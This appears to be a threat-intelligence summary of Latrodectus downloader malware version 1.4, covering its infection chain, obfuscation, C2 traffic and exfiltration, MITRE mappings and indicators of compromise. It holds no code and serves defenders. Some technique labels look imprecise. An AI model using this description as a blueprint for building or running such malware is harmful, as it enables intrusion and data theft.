Latrodectus is a downloader malware with IcedID-like characteristics that is distributed via targeted email spam by TA577 and TA578. The 1.4 update introduces stronger obfuscation, new commands, and updated C2 behavior, including JavaScript delivery, a rundll32-loaded DLL, and a revamped payload chain. Hashtags: #Latrodectus #IcedID #TA577 #TA578 #DaveCrypter
Keypoints
- Latrodectus is a downloader malware noted for its IcedID-like code and infrastructure.
- First observed by Walmart in October 2023.
- Distributed via email spam campaigns by threat actors TA577 and TA578.
- Version 1.4 adds AES256 string obfuscation, new C2 endpoint, and two new backdoor commands.
- Initial payload is a JavaScript file that downloads an MSI file.
- MSI loads a DLL named “nvidia.dll” via rundll32.exe, with the DLL stored inside a CAB file named “disk1.”
- C2 traffic collects system information, encrypts it, and transmits it to the C2; new variant uses /test endpoint.
MITRE Techniques
- [T1059.007] JavaScript – The first payload of the infection chain is a JavaScript file obfuscated using a similar approach used by other Latrodectus campaigns. ‘The first payload of the infection chain is a JavaScript file obfuscated using a similar approach used by other Latrodectus campaigns.’
- [T1105] Ingress Tool Transfer – The malware downloads an MSI file from a remote server and executes/installs it. ‘The malware searches for lines starting with the “/////” string, puts them into a buffer and executes them as a JS function. The executed function then downloads an MSI file from a remote server and executes/installs it.’
- [T1218.011] Rundll32 – The MSI file uses the rundll32.exe Windows tool to load a DLL named “nvidia.dll” and calls a function named “AnselEnableCheck” exported by this DLL. ‘The MSI file uses the rundll32.exe Windows tool to load a DLL named “nvidia.dll” and calls a function named “AnselEnableCheck” exported by this DLL.’
- [T1027] Obfuscated/Compressed Files and Information – The crypter named Dave obfuscates the main payload; the crypter stores the payload in a resource or a section. ‘The crypter stores the payload to be executed either in a resource or in a section.’ ‘String obfuscation uses AES256 in CTR mode.’
- [T1071.001] Web Protocols – Initial C2 uses HTTP POST to communicate data; ‘The information is sent in the HTTP body via an HTTP POST request. The endpoint used in the new variants is “/test” instead of “/live”.’
- [T1041] Exfiltration Over C2 Channel – System information is encrypted with RC4 and base64 before transmission. ‘The information is formatted… encrypted using the RC4 algorithm, encoded using base64 and sent to the C2.’
- [T1060] Registry Run Keys / Startup Folder – Persistence mechanism referenced in the attack framework. ‘Persistence: Registry Run Keys / Startup Folder (T1060)’.
- [T1003] Credential Dumping – Credential access technique listed in the article. ‘Credential Dumping (T1003)’.
- [T1055] Shellcode – Command 0x16 downloads a shellcode and executes it in a new thread. ‘Command 0x16: In this command the malware downloads a shellcode from the specified server and executes it via a new thread.’
Indicators of Compromise
- [File] nvidia.dll – loaded by rundll32 during MSI execution to run the final payload. nvidia.dll is the critical DLL used in the infection chain.
- [File] disk1 – CAB file inside the MSI that stores the malicious payload. disk1 contains the DLL used by the loader.
- [URL] /test – C2 HTTP endpoint used by the latest variant for data exfiltration. ‘The endpoint used in the new variants is “/test” …’
- [Signature] Netskope Threat Protection detections – Gen:Variant.Ulise.493872, Trojan.Generic.36724146; and Win64.Trojan.ShellCoExec as proactive coverage indicators.
Read more: https://www.netskope.com/blog/latrodectus-rapid-evolution-continues-with-latest-new-payload-features